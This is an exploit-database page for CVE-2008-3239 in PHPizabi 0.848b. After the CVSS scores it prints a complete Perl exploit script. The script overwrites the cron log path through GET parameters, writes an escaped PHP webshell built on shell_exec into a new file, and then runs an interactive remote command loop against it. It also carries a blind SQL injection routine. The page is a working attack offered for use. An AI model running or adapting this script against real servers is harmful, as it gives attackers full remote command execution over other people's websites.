PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

2008.07.24
Credit: inphex0
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-3239
CWE: CWE-20


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl #inphex #PHPizabi v0.848b C1 HFP1 Remote Code Execution #http://www.dz-secure.com/tools/1/WebESploit.pl.txt #if you are seeking for a partner to work on some project(s) just send an email inphex0 [ at ] gmail [ dot ] com #system/v_cron_proc.php # if (!function_exists("writeLogEntry")) { # function writeLogEntry($data) { # global $CONF; # # touch($CONF["CRON_LOGFILE"]); # # if ($handle = fopen($CONF["CRON_LOGFILE"], "a")) { # fwrite($handle, "[".date($CONF["LOCALE_LONG_DATE_TIME"])."] $data \n"); # fclose($handle); # } # } # } # # #writeLogEntry("Cron cycle started"); #writeLogEntry("Cron cycle ended"); ######################################################## #overwritable: #1.$CONF["CRON_LOGFILE"] #2.$CONF["LOCALE_LONG_DATE_TIME"] # #date($CONF["LOCALE_LONG_DATE_TIME"]) ;\ #solution: #<?php #echo date("a"); #?> #returns: pm #<?php #echo date("\a"); #?> #returns: a #seems logically eh? # #usage: perl ye.pl host /path/ # ## [C:\]# perl ye.pl host /path/ ## $[host]# id ## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data) # use LWP::UserAgent; use HTTP::Cookies; use Switch; $hy = shift; $host_ = "http://".$hy; $path_ = shift; $port = 80; #default $info{'info'} = { "description" => [""], "options" => { "agent" => "", "proxy" => "", "default_headers" => [ ["key","value"]], "timeout" => 0, "cookie" => { "cookie" => [""], }, }, "sending_options" => { "host" => $host_, "path" => $path_."system/v_cron_proc.php", "port" => $port, "method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION", "attack" => { "CONF[CRON_LOGFILE]" => ["get","CONF[CRON_LOGFILE]","yeee.php"], "CONF[LOCALE_LONG_DATE_TIME]" => ["get","CONF[LOCALE_LONG_DATE_TIME]","<?\\p\\h\\p \\e\\c\\h\\o \\s\\h\\e\\l\\l_\\ex\\e\\c\\(\\\$_\\G\\E\\T[\\c\\m\\d]\\);\\e\\x\\i\\t;?>"], #nice eh?:) }, }, }; &start($info{'info'},222); while () { print "\$[".$hy."]#"; $cmd = <STDIN>;chomp($cmd); $info{'info'} = { "description" => [""], "options" => { "agent" => "", "proxy" => "", "default_headers" => [ ["key","value"]], "timeout" => 0, "cookie" => { "cookie" => [""], }, }, "sending_options" => { "host" => $host_, "path" => $path_."system/yeee.php", "port" => $port, "method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION", "attack" => { "CONF[CRON_LOGFILE]" => ["get","cmd",$cmd], }, }, }; &start($info{'info'},221); print ${$info{'info'}}{221}{'content'}."\n"; } sub start { $a_ = shift; $id = shift; $post_dA = ""; $get_dA = get_d_p_s("get"); $post_dA = get_d_p_s("post"); my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0); $jj = 1; $ii = 48; $hh = 1; $ppp = 0; $s = shift; $a = ""; $res_p = ""; $h = ""; $ua= ""; $agent= ""; $k= ""; $v= ""; $get_data= ""; $post_data= ""; $header_dA = ""; $h_host_h_xdsjaop = $a_->{'sending_options'}{'host'}; $h_path_h_xdsjaop = $a_->{'sending_options'}{'path'}; $h_port_h_xdsjaop = $a_->{'sending_options'}{'port'}; $method_m = $a_->{'sending_options'}{'method_a'}; $ua = LWP::UserAgent->new; $ua->timeout($a_->{'options'}{'timeout'}); if ($a_->{'options'}{'proxy'}) { $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'}); } $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; $ua->agent($agent); { while (($k,$v) = each(%{$a_})) { if ($k ne "options" && $k ne "sending_options") { foreach $r (@{$a_->{$k}}) { print $a_->{$k}[0]; } } } foreach $j (@{$a_->{'options'}{'default_headers'}}) { $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]); $m++; } if ($a_->{'options'}{'cookie'}{'cookie'}[0]) { $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]); } } switch ($method_m) { case "attack" { &attack();} case "SQL_INJECTION_BLIND" { &sql_injection_blind();} case "REMOTE_COMMAND_EXECUTION" { &attack();} case "REMOTE_CODE_EXECUTION" {&attack();} case "REMOTE_FILE_INCLUSION" { &attack();} case "LOCAL_FILE_INCLUSION" { &attack(); } else { &attack(); } } sub attack { my ($jj); my ($h); my($x); if ($post_dA eq "") { $method = "get"; } elsif ($post_dA ne "") { $method = "post"; } if ($method eq "get") { $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA); ${$a_}{$id}{'content'} = $res_p; foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) { if (${$jj} ne "") { ${$a_}{$id}{'regex'}[$h][$x] = ${$jj}; $x++; } $jj++; } $h++; } } elsif ($method eq "post") { $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA); ${$a_}{$id}{'content'} = $res_p; foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) { if (${$jj} ne "") { ${$a_}{$id}{'regex'}[$h][$x] = ${$jj}; $x++; } $jj++; } $h++; } } } sub sql_injection_blind { while () { while ($ii <= 120) { $itsx = "[".chr($ii)."]"; $l = length($itsx); $b = ("\b")x$l; syswrite STDOUT,$b.$itsx; if(check($ii,$hh) == 1) { syswrite STDOUT,$b.chr($ii)."---"; $hh++; $chr = $chr.chr($ii); } $ii++; } push(@ffs,length($chr)); if (($#ffs - 999) == $ffs) { exit; } $ii = 48; } } sub check($$) { my ($h); my ($a); $ii = shift; $hh = shift; if (get_d_p_s("post") ne "") { $method = "post"; } else { $method = "get";} if ($method eq "get") { $ppp++; $query = modify($get_dA,$ii,$hh); $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query); foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) { if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) { return 1; } else { return 0;} } else { if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) { return 0; }else { return 1;} } $h++; } } elsif ($method eq "post") { $ppp++; $query_g = modify($get_dA,$ii,$hh); $query_p = modify($post_dA,$ii,$hh); $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p); foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) { return 1; } else { return 0; } $h++; } } } sub modify($$$) { $string = shift; $replace_by = shift; $replace_by1 = shift; if ($string !~/\$i/ && $string !~/\$h/) { return $string; } elsif ($string !~/\$i/) { $ff = substr($string,0,index($string,"\$h")); $ee = substr($string,rindex($string,"\$h")+2); $string = $ff.$replace_by1.$ee; return $string; } elsif ($string !~/\$h/) { $f = substr($string,0,index($string,"\$i")); $e = substr($string,rindex($string,"\$i")+2); $string = $f.$replace_by.$e; return $string; } else { $f = substr($string,0,index($string,"\$i")); $e = substr($string,rindex($string,"\$i")+2); $string = $f.$replace_by.$e; $ff = substr($string,0,index($string,"\$h")); $ee = substr($string,rindex($string,"\$h")+2); $string = $ff.$replace_by1.$ee; return $string; } } sub get_d_p_s { $k = 0; $v = 0; $g_d_p_s = shift; @post = (); @get = (); $post_data = ""; $get_data = ""; $header_data = ""; %header_dA = (); $p = ""; $g = ""; while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}})) { if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/) { $p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&"; } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) { $g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&"; } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header") { $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2]; } } if ($g_d_p_s eq "get") { return $g; } elsif ($g_d_p_s eq "post") { return $p; } elsif ($g_d_p_s eq "header") { return %header_dA; } @a_ = (); } sub get_data { $h_host_h_xdsjaop = shift; $h_path_h_xdsjaop = shift; %hash = get_d_p_s("header"); while (($u,$c) = each(%hash)) { $ua->default_headers->push_header($u => $c); } $req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop); return $req->content; } sub post_data { $h_host_h_xdsjaop = shift; $h_path_h_xdsjaop = shift; $content_type = shift; $send = shift; %hash = get_d_p_s("header"); while (($u,$c) = each(%hash)) { $ua->default_headers->push_header($u => $c); } $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop); $req->content_type($content_type); $req->content($send); $res = $ua->request($req); return $res->content; } }

References:

http://www.securityfocus.com/bid/30257
http://www.milw0rm.com/exploits/6085
http://secunia.com/advisories/31127


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top